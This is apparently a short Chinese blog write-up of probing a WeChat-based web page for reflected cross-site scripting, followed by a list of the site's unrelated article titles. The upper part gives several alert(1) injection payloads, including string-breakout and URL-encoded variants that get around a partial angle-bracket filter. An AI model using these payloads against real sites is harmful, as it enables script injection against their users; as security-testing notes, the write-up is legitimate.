环境：一个微信端（所以用浏览器演示UI有点变形）

下图是未插任何脚本时的原页面。

按惯例，上一波【"><script>alert(1)</script>】

无弹窗，看下源代码，尖括号被过滤掉一半！？

试了半天，尖括号还是无法绕开。。

payload：  【    ';})</script><script>alert(1)</script>   】

突然发现，好像哪里不对……明明在script下，我居然还要跳出去另一个script？傻了傻了，直接在script里运行不就行了……

payload：【  ';alert(1)//  】搞定

payload：【  '%2balert(1)%2b'  】

后面发现，减号也可以？！什么鬼？！

感谢表哥的文章指导减号payload

https://bbs.ichunqiu.com/thread-31886-1-1.html

最新文章

1. Ubuntu Server 14.04 集成
2. Legacy Notes网络和服务端配置的笔记
3. SharePoint 2013 Error - TypeError: Unable to get property &#39;replace&#39; of undefined or null reference
4. 13款经典BI项目报表&amp;界面风格设计方案
5. HDU 1425 sort（堆排序/快排/最大堆/最小堆）
6. Python学习路程day12
7. Android开发的进阶之路
8. c语言排序算法总结
9. 开源PaaS产品介绍
10. Google Code Jam 2014 Qualification 题解
11. 南阳理工ACM-OJ 分数加减法 最大公约数的使用
12. Struts2框架学习(三) 数据处理
13. 初学Python之 安装包的抉择~~
14. 请小心使用 ng-repeat 中的 $index
15. linux目录2
16. 查看当前Jquery版本
17. Mybatis学习（二）————— 全局配置文件详解
18. 第9章 Java中的线程池 第10章 Exector框架
19. JFinal提示：java.lang.RuntimeException: dao 只允许调用查询方法
20. cygwin如何下编译安装tmux?

热门文章

1. 微信小程序把玩（十一）icon组件
2. Android零基础入门第12节：熟悉Android Studio界面，开始装逼卖萌
3. UWP访问KnownFolders.RemovableDevices时（读取U盘文件）抛出异常UnauthorizedAccessException
4. spring bean 加载过程（spring）
5. 前端开发在手机UC浏览器上遇到的坑
6. SYN6101型 RS485子钟
7. Paragon NTFS for Mac 15.5.53 中文破解版（激活码）下载
8. 【记录】mybatis中获取常量类中数据
9. 【nginx】反向代理
10. 为什么string是引用类型 值还不可以修改